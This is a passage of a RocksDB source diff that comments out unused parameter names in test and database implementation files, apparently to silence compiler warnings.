+++ b/db/compaction_picker_test.cc
@@ -20,7 +20,9 @@ namespace rocksdb {
 class CountingLogger : public Logger {
  public:
   using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override { log_count++; }
+  virtual void Logv(const char* /*format*/, va_list /*ap*/) override {
+    log_count++;
+  }
   size_t log_count;
 };
 
diff --git a/db/comparator_db_test.cc b/db/comparator_db_test.cc
index 28a2a5658e7..83740ffda00 100644
--- a/db/comparator_db_test.cc
+++ b/db/comparator_db_test.cc
@@ -188,10 +188,10 @@ class DoubleComparator : public Comparator {
       return -1;
     }
   }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
+  virtual void FindShortestSeparator(std::string* /*start*/,
+                                     const Slice& /*limit*/) const override {}
 
-  virtual void FindShortSuccessor(std::string* key) const override {}
+  virtual void FindShortSuccessor(std::string* /*key*/) const override {}
 };
 
 class HashComparator : public Comparator {
@@ -211,10 +211,10 @@ class HashComparator : public Comparator {
       return -1;
     }
   }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
+  virtual void FindShortestSeparator(std::string* /*start*/,
+                                     const Slice& /*limit*/) const override {}
 
-  virtual void FindShortSuccessor(std::string* key) const override {}
+  virtual void FindShortSuccessor(std::string* /*key*/) const override {}
 };
 
 class TwoStrComparator : public Comparator {
@@ -243,10 +243,10 @@ class TwoStrComparator : public Comparator {
     }
     return a2.compare(b2);
   }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
+  virtual void FindShortestSeparator(std::string* /*start*/,
+                                     const Slice& /*limit*/) const override {}
 
-  virtual void FindShortSuccessor(std::string* key) const override {}
+  virtual void FindShortSuccessor(std::string* /*key*/) const override {}
 };
 }  // namespace
diff --git a/db/db_block_cache_test.cc b/db/db_block_cache_test.cc
index 169cadc85c3..f4d61eefe6a 100644
--- a/db/db_block_cache_test.cc
+++ b/db/db_block_cache_test.cc
@@ -47,7 +47,7 @@ class DBBlockCacheTest : public DBTestBase {
     return options;
   }
 
-  void InitTable(const Options& options) {
+  void InitTable(const Options& /*options*/) {
     std::string value(kValueSize, 'a');
     for (size_t i = 0; i < kNumBlocks; i++) {
       ASSERT_OK(Put(ToString(i), value.c_str()));
diff --git a/db/db_bloom_filter_test.cc b/db/db_bloom_filter_test.cc
index e6248a04014..d4b034c5346 100644
--- a/db/db_bloom_filter_test.cc
+++ b/db/db_bloom_filter_test.cc
@@ -1057,10 +1057,10 @@ TEST_F(DBBloomFilterTest, OptimizeFiltersForHits) {
   int32_t non_trivial_move = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
+      [&](void* /*arg*/) { trivial_move++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
+      [&](void* /*arg*/) { non_trivial_move++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
 
   CompactRangeOptions compact_options;
diff --git a/db/db_compaction_filter_test.cc b/db/db_compaction_filter_test.cc
index 9f751f059fa..a25adcc356f 100644
--- a/db/db_compaction_filter_test.cc
+++ b/db/db_compaction_filter_test.cc
@@ -26,9 +26,9 @@ class DBTestCompactionFilter : public DBTestBase {
 
 class KeepFilter : public CompactionFilter {
  public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
+  virtual bool Filter(int /*level*/, const Slice& /*key*/,
+                      const Slice& /*value*/, std::string* /*new_value*/,
+                      bool* /*value_changed*/) const override {
     cfilter_count++;
     return false;
   }
@@ -38,9 +38,9 @@ class KeepFilter : public CompactionFilter {
 
 class DeleteFilter : public CompactionFilter {
  public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
+  virtual bool Filter(int /*level*/, const Slice& /*key*/,
+                      const Slice& /*value*/, std::string* /*new_value*/,
+                      bool* /*value_changed*/) const override {
     cfilter_count++;
     return true;
   }
@@ -50,9 +50,9 @@ class DeleteFilter : public CompactionFilter {
 
 class DeleteISFilter : public CompactionFilter {
  public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
+  virtual bool Filter(int /*level*/, const Slice& key, const Slice& /*value*/,
+                      std::string* /*new_value*/,
+                      bool* /*value_changed*/) const override {
     cfilter_count++;
     int i = std::stoi(key.ToString());
     if (i > 5 && i <= 105) {
@@ -70,8 +70,10 @@ class DeleteISFilter : public CompactionFilter {
 // zero-padded to length 10.
 class SkipEvenFilter : public CompactionFilter {
  public:
-  virtual Decision FilterV2(int level, const Slice& key, ValueType value_type,
-                            const Slice& existing_value, std::string* new_value,
+  virtual Decision FilterV2(int /*level*/, const Slice& key,
+                            ValueType /*value_type*/,
+                            const Slice& /*existing_value*/,
+                            std::string* /*new_value*/,
                             std::string* skip_until) const override {
     cfilter_count++;
     int i = std::stoi(key.ToString());
@@ -93,9 +95,9 @@ class SkipEvenFilter : public CompactionFilter {
 class DelayFilter : public CompactionFilter {
  public:
   explicit DelayFilter(DBTestBase* d) : db_test(d) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
+  virtual bool Filter(int /*level*/, const Slice& /*key*/,
+                      const Slice& /*value*/, std::string* /*new_value*/,
+                      bool* /*value_changed*/) const override {
     db_test->env_->addon_time_.fetch_add(1000);
     return true;
   }
@@ -110,9 +112,9 @@ class ConditionalFilter : public CompactionFilter {
  public:
   explicit ConditionalFilter(const std::string* filtered_value)
       : filtered_value_(filtered_value) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
+  virtual bool Filter(int /*level*/, const Slice& /*key*/, const Slice& value,
+                      std::string* /*new_value*/,
+                      bool* /*value_changed*/) const override {
     return value.ToString() == *filtered_value_;
   }
 
@@ -126,9 +128,9 @@ class ChangeFilter : public CompactionFilter {
  public:
   explicit ChangeFilter() {}
 
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
+  virtual bool Filter(int /*level*/, const Slice& /*key*/,
+                      const Slice& /*value*/, std::string* new_value,
+                      bool* value_changed) const override {
     assert(new_value != nullptr);
     *new_value = NEW_VALUE;
     *value_changed = true;
@@ -217,7 +219,7 @@ class DelayFilterFactory : public CompactionFilterFactory {
  public:
   explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {}
   virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
+      const CompactionFilter::Context& /*context*/) override {
     return std::unique_ptr<CompactionFilter>(new DelayFilter(db_test));
   }
 
@@ -233,7 +235,7 @@ class ConditionalFilterFactory : public CompactionFilterFactory {
       : filtered_value_(filtered_value.ToString()) {}
 
   virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
+      const CompactionFilter::Context& /*context*/) override {
     return std::unique_ptr<CompactionFilter>(
         new ConditionalFilter(&filtered_value_));
   }
@@ -251,7 +253,7 @@ class ChangeFilterFactory : public CompactionFilterFactory {
   explicit ChangeFilterFactory() {}
 
   virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
+      const CompactionFilter::Context& /*context*/) override {
     return std::unique_ptr<CompactionFilter>(new ChangeFilter());
   }
 
diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc
index 4c7da8d1b50..898db51ef7a 100644
--- a/db/db_compaction_test.cc
+++ b/db/db_compaction_test.cc
@@ -53,7 +53,7 @@ class FlushedFileCollector : public EventListener {
   FlushedFileCollector() {}
   ~FlushedFileCollector() {}
 
-  virtual void OnFlushCompleted(DB* db, const FlushJobInfo& info) override {
+  virtual void OnFlushCompleted(DB* /*db*/, const FlushJobInfo& info) override {
     std::lock_guard<std::mutex> lock(mutex_);
     flushed_files_.push_back(info.file_path);
   }
@@ -282,7 +282,7 @@ TEST_F(DBCompactionTest, TestTableReaderForCompaction) {
   });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "TableCache::GetTableReader:0",
-      [&](void* arg) { num_new_table_reader++; });
+      [&](void* /*arg*/) { num_new_table_reader++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
 
   for (int k = 0; k < options.level0_file_num_compaction_trigger; ++k) {
@@ -838,7 +838,7 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveOneFile) {
   int32_t trivial_move = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
+      [&](void* /*arg*/) { trivial_move++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
 
   Options options = CurrentOptions();
@@ -895,10 +895,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveNonOverlappingFiles) {
   int32_t non_trivial_move = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
+      [&](void* /*arg*/) { trivial_move++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
+      [&](void* /*arg*/) { non_trivial_move++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
 
   Options options = CurrentOptions();
@@ -994,10 +994,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveTargetLevel) {
   int32_t non_trivial_move = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
+      [&](void* /*arg*/) { trivial_move++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
+      [&](void* /*arg*/) { non_trivial_move++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
 
   Options options = CurrentOptions();
@@ -1053,10 +1053,10 @@ TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) {
   int32_t non_trivial_move = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
+      [&](void* /*arg*/) { trivial_move++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
+      [&](void* /*arg*/) { non_trivial_move++; });
   bool first = true;
   // Purpose of dependencies:
   // 4 -> 1: ensure the order of two non-trivial compactions
@@ -1067,7 +1067,7 @@ TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) {
        {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:2"},
        {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:3"}});
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
+      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) {
         if (first) {
           first = false;
          TEST_SYNC_POINT("DBCompaction::ManualPartial:4");
@@ -1198,17 +1198,17 @@ TEST_F(DBCompactionTest, DISABLED_ManualPartialFill) {
   int32_t non_trivial_move = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
+      [&](void* /*arg*/) { trivial_move++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
+      [&](void* /*arg*/) { non_trivial_move++; });
   bool first = true;
   bool second = true;
   rocksdb::SyncPoint::GetInstance()->LoadDependency(
       {{"DBCompaction::PartialFill:4", "DBCompaction::PartialFill:1"},
{"DBCompaction::PartialFill:2", "DBCompaction::PartialFill:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (first) { TEST_SYNC_POINT("DBCompaction::PartialFill:4"); first = false; @@ -1444,10 +1444,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveToLastLevelWithFiles) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial_move++; }); + [&](void* /*arg*/) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -2325,16 +2325,16 @@ TEST_P(DBCompactionTestWithParam, CompressLevelCompaction) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "Compaction::InputCompressionMatchesOutput:Matches", - [&](void* arg) { matches++; }); + [&](void* /*arg*/) { matches++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "Compaction::InputCompressionMatchesOutput:DidntMatch", - [&](void* arg) { didnt_match++; }); + [&](void* /*arg*/) { didnt_match++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial++; }); + [&](void* /*arg*/) { non_trivial++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Reopen(options); @@ -2496,10 +2496,10 @@ TEST_P(DBCompactionTestWithParam, ForceBottommostLevelCompaction) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* arg) { non_trivial_move++; }); + [&](void* /*arg*/) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -2656,9 +2656,7 @@ TEST_P(DBCompactionDirectIOTest, DirectIO) { }); if (options.use_direct_io_for_flush_and_compaction) { SyncPoint::GetInstance()->SetCallBack( - "SanitizeOptions:direct_io", [&](void* arg) { - readahead = true; - }); + "SanitizeOptions:direct_io", [&](void* /*arg*/) { readahead = true; }); } SyncPoint::GetInstance()->EnableProcessing(); CreateAndReopenWithCF({"pikachu"}, options); diff --git a/db/db_dynamic_level_test.cc b/db/db_dynamic_level_test.cc index f968e7fc057..6542db18c02 100644 --- a/db/db_dynamic_level_test.cc +++ b/db/db_dynamic_level_test.cc @@ -194,7 +194,7 @@ TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBase2) { // Hold compaction jobs to make sure rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::Run():Start", - [&](void* arg) { env_->SleepForMicroseconds(100000); }); + [&](void* /*arg*/) { env_->SleepForMicroseconds(100000); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); ASSERT_OK(dbfull()->SetOptions({ {"disable_auto_compactions", "true"}, @@ -378,7 +378,7 @@ TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBaseInc) { int non_trivial = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* 
arg) { non_trivial++; }); + [&](void* /*arg*/) { non_trivial++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Random rnd(301); diff --git a/db/db_flush_test.cc b/db/db_flush_test.cc index 107e82467cb..0dab8bfe59a 100644 --- a/db/db_flush_test.cc +++ b/db/db_flush_test.cc @@ -101,7 +101,7 @@ TEST_F(DBFlushTest, FlushInLowPriThreadPool) { std::thread::id tid; int num_flushes = 0, num_compactions = 0; SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BGWorkFlush", [&](void* arg) { + "DBImpl::BGWorkFlush", [&](void* /*arg*/) { if (tid == std::thread::id()) { tid = std::this_thread::get_id(); } else { @@ -110,7 +110,7 @@ TEST_F(DBFlushTest, FlushInLowPriThreadPool) { ++num_flushes; }); SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BGWorkCompaction", [&](void* arg) { + "DBImpl::BGWorkCompaction", [&](void* /*arg*/) { ASSERT_EQ(tid, std::this_thread::get_id()); ++num_compactions; }); diff --git a/db/db_impl.cc b/db/db_impl.cc index f770b51ae7f..97f9b202405 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -595,8 +595,9 @@ Status DBImpl::SetDBOptions( } // return the same level if it cannot be moved -int DBImpl::FindMinimumEmptyLevelFitting(ColumnFamilyData* cfd, - const MutableCFOptions& mutable_cf_options, int level) { +int DBImpl::FindMinimumEmptyLevelFitting( + ColumnFamilyData* cfd, const MutableCFOptions& /*mutable_cf_options*/, + int level) { mutex_.AssertHeld(); const auto* vstorage = cfd->current()->storage_info(); int minimum_level = level; @@ -806,7 +807,7 @@ struct IterState { bool background_purge; }; -static void CleanupIteratorState(void* arg1, void* arg2) { +static void CleanupIteratorState(void* arg1, void* /*arg2*/) { IterState* state = reinterpret_cast(arg1); if (state->super_version->Unref()) { @@ -2190,31 +2191,31 @@ Status DBImpl::GetDbIdentity(std::string& identity) const { } // Default implementation -- returns not supported status -Status DB::CreateColumnFamily(const ColumnFamilyOptions& cf_options, - const std::string& column_family_name, - ColumnFamilyHandle** handle) { +Status DB::CreateColumnFamily(const ColumnFamilyOptions& /*cf_options*/, + const std::string& /*column_family_name*/, + ColumnFamilyHandle** /*handle*/) { return Status::NotSupported(""); } Status DB::CreateColumnFamilies( - const ColumnFamilyOptions& cf_options, - const std::vector& column_family_names, - std::vector* handles) { + const ColumnFamilyOptions& /*cf_options*/, + const std::vector& /*column_family_names*/, + std::vector* /*handles*/) { return Status::NotSupported(""); } Status DB::CreateColumnFamilies( - const std::vector& column_families, - std::vector* handles) { + const std::vector& /*column_families*/, + std::vector* /*handles*/) { return Status::NotSupported(""); } -Status DB::DropColumnFamily(ColumnFamilyHandle* column_family) { +Status DB::DropColumnFamily(ColumnFamilyHandle* /*column_family*/) { return Status::NotSupported(""); } Status DB::DropColumnFamilies( - const std::vector& column_families) { + const std::vector& /*column_families*/) { return Status::NotSupported(""); } diff --git a/db/db_impl_compaction_flush.cc b/db/db_impl_compaction_flush.cc index 68d2831233b..e04fc6ee93e 100644 --- a/db/db_impl_compaction_flush.cc +++ b/db/db_impl_compaction_flush.cc @@ -779,7 +779,7 @@ int DBImpl::NumberLevels(ColumnFamilyHandle* column_family) { return cfh->cfd()->NumberLevels(); } -int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* column_family) { +int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* /*column_family*/) { return 0; } diff --git 
a/db/db_impl_readonly.cc b/db/db_impl_readonly.cc index d4fe7e702f8..e3970306572 100644 --- a/db/db_impl_readonly.cc +++ b/db/db_impl_readonly.cc @@ -105,7 +105,7 @@ Status DBImplReadOnly::NewIterators( } Status DB::OpenForReadOnly(const Options& options, const std::string& dbname, - DB** dbptr, bool error_if_log_file_exist) { + DB** dbptr, bool /*error_if_log_file_exist*/) { *dbptr = nullptr; // Try to first open DB as fully compacted DB diff --git a/db/db_impl_readonly.h b/db/db_impl_readonly.h index 9bdc95cc874..35f2d1c8586 100644 --- a/db/db_impl_readonly.h +++ b/db/db_impl_readonly.h @@ -36,46 +36,47 @@ class DBImplReadOnly : public DBImpl { std::vector* iterators) override; using DBImpl::Put; - virtual Status Put(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override { + virtual Status Put(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, const Slice& /*value*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Merge; - virtual Status Merge(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override { + virtual Status Merge(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, const Slice& /*value*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Delete; - virtual Status Delete(const WriteOptions& options, - ColumnFamilyHandle* column_family, - const Slice& key) override { + virtual Status Delete(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::SingleDelete; - virtual Status SingleDelete(const WriteOptions& options, - ColumnFamilyHandle* column_family, - const Slice& key) override { + virtual Status SingleDelete(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/) override { return Status::NotSupported("Not supported operation in read only mode."); } - virtual Status Write(const WriteOptions& options, - WriteBatch* updates) override { + virtual Status Write(const WriteOptions& /*options*/, + WriteBatch* /*updates*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& options, - ColumnFamilyHandle* column_family, - const Slice* begin, const Slice* end) override { + virtual Status CompactRange(const CompactRangeOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice* /*begin*/, + const Slice* /*end*/) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::CompactFiles; virtual Status CompactFiles( - const CompactionOptions& compact_options, - ColumnFamilyHandle* column_family, - const std::vector& input_file_names, - const int output_level, const int output_path_id = -1) override { + const CompactionOptions& /*compact_options*/, + ColumnFamilyHandle* /*column_family*/, + const std::vector& /*input_file_names*/, + const int /*output_level*/, const int /*output_path_id*/ = -1) override { return Status::NotSupported("Not supported operation in read only mode."); } @@ -83,18 +84,18 @@ class DBImplReadOnly : public DBImpl { return Status::NotSupported("Not supported operation in read only mode."); } - 
virtual Status EnableFileDeletions(bool force) override { + virtual Status EnableFileDeletions(bool /*force*/) override { return Status::NotSupported("Not supported operation in read only mode."); } virtual Status GetLiveFiles(std::vector&, - uint64_t* manifest_file_size, - bool flush_memtable = true) override { + uint64_t* /*manifest_file_size*/, + bool /*flush_memtable*/ = true) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Flush; - virtual Status Flush(const FlushOptions& options, - ColumnFamilyHandle* column_family) override { + virtual Status Flush(const FlushOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/) override { return Status::NotSupported("Not supported operation in read only mode."); } @@ -105,9 +106,9 @@ class DBImplReadOnly : public DBImpl { using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* column_family, - const std::vector& external_files, - const IngestExternalFileOptions& ingestion_options) override { + ColumnFamilyHandle* /*column_family*/, + const std::vector& /*external_files*/, + const IngestExternalFileOptions& /*ingestion_options*/) override { return Status::NotSupported("Not supported operation in read only mode."); } diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index f52bce611a9..2579cc87cfd 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -1002,7 +1002,7 @@ Status DBImpl::ScheduleFlushes(WriteContext* context) { } #ifndef ROCKSDB_LITE -void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* cfd, +void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* /*cfd*/, const MemTableInfo& mem_table_info) { if (immutable_db_options_.listeners.size() == 0U) { return; diff --git a/db/db_iter_test.cc b/db/db_iter_test.cc index 1b7c13b06f3..88493ccfbfb 100644 --- a/db/db_iter_test.cc +++ b/db/db_iter_test.cc @@ -2459,7 +2459,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace1) { // and before an SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( "MergeIterator::Prev:BeforeSeekToLast", - [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 12u); }); + [&](void* /*arg*/) { internal_iter2_->Add("z", kTypeValue, "7", 12u); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); db_iter_->Prev(); @@ -2494,7 +2494,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace2) { // mem table after MergeIterator::Prev() realized the mem tableiterator is at // its end and before an SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) { + "MergeIterator::Prev:BeforeSeekToLast", [&](void* /*arg*/) { internal_iter2_->Add("z", kTypeValue, "7", 12u); internal_iter2_->Add("z", kTypeValue, "7", 11u); }); @@ -2532,7 +2532,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace3) { // mem table after MergeIterator::Prev() realized the mem table iterator is at // its end and before an SeekToLast() is called. 
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) {
+      "MergeIterator::Prev:BeforeSeekToLast", [&](void* /*arg*/) {
         internal_iter2_->Add("z", kTypeValue, "7", 16u, true);
         internal_iter2_->Add("z", kTypeValue, "7", 15u, true);
         internal_iter2_->Add("z", kTypeValue, "7", 14u, true);
diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc
index 90f43ea374d..9d344e7af86 100644
--- a/db/db_iterator_test.cc
+++ b/db/db_iterator_test.cc
@@ -24,7 +24,7 @@ class DBIteratorTest : public DBTestBase {
 
 class FlushBlockEveryKeyPolicy : public FlushBlockPolicy {
  public:
-  virtual bool Update(const Slice& key, const Slice& value) override {
+  virtual bool Update(const Slice& /*key*/, const Slice& /*value*/) override {
     if (!start_) {
       start_ = true;
       return false;
@@ -44,8 +44,8 @@ class FlushBlockEveryKeyPolicyFactory : public FlushBlockPolicyFactory {
   }
 
   FlushBlockPolicy* NewFlushBlockPolicy(
-      const BlockBasedTableOptions& table_options,
-      const BlockBuilder& data_block_builder) const override {
+      const BlockBasedTableOptions& /*table_options*/,
+      const BlockBuilder& /*data_block_builder*/) const override {
     return new FlushBlockEveryKeyPolicy;
   }
 };
diff --git a/db/db_memtable_test.cc b/db/db_memtable_test.cc
index 63d274f6ab5..5ce3e319122 100644
--- a/db/db_memtable_test.cc
+++ b/db/db_memtable_test.cc
@@ -121,7 +121,7 @@ class TestPrefixExtractor : public SliceTransform {
     return separator(key) != nullptr;
   }
 
-  virtual bool InRange(const Slice& key) const override { return false; }
+  virtual bool InRange(const Slice& /*key*/) const override { return false; }
 
  private:
   const char* separator(const Slice& key) const {
diff --git a/db/db_properties_test.cc b/db/db_properties_test.cc
index b09fe1ffacc..2b099a39a45 100644
--- a/db/db_properties_test.cc
+++ b/db/db_properties_test.cc
@@ -985,8 +985,9 @@ class CountingUserTblPropCollector : public TablePropertiesCollector {
     return Status::OK();
   }
 
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
+  Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/,
+                    EntryType /*type*/, SequenceNumber /*seq*/,
+                    uint64_t /*file_size*/) override {
     ++count_;
     return Status::OK();
   }
@@ -1027,8 +1028,9 @@ class CountingDeleteTabPropCollector : public TablePropertiesCollector {
  public:
   const char* Name() const override { return "CountingDeleteTabPropCollector"; }
 
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
+  Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/,
+                    EntryType type, SequenceNumber /*seq*/,
+                    uint64_t /*file_size*/) override {
     if (type == kEntryDelete) {
       num_deletes_++;
     }
@@ -1055,7 +1057,7 @@ class CountingDeleteTabPropCollectorFactory
     : public TablePropertiesCollectorFactory {
  public:
   virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
+      TablePropertiesCollectorFactory::Context /*context*/) override {
     return new CountingDeleteTabPropCollector();
   }
   const char* Name() const override {
diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc
index 73c6fe8016d..9427e0b5c98 100644
--- a/db/db_sst_test.cc
+++ b/db/db_sst_test.cc
@@ -231,11 +231,12 @@ TEST_F(DBSSTTest, DBWithSstFileManager) {
   int files_deleted = 0;
   int files_moved = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileManagerImpl::OnAddFile", [&](void* arg) { files_added++; });
+      "SstFileManagerImpl::OnAddFile", [&](void* /*arg*/) { files_added++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileManagerImpl::OnDeleteFile", [&](void* arg) { files_deleted++; });
+      "SstFileManagerImpl::OnDeleteFile",
+      [&](void* /*arg*/) { files_deleted++; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileManagerImpl::OnMoveFile", [&](void* arg) { files_moved++; });
+      "SstFileManagerImpl::OnMoveFile", [&](void* /*arg*/) { files_moved++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
 
   Options options = CurrentOptions();
@@ -385,7 +386,7 @@ TEST_F(DBSSTTest, DeleteSchedulerMultipleDBPaths) {
   int bg_delete_file = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
+      [&](void* /*arg*/) { bg_delete_file++; });
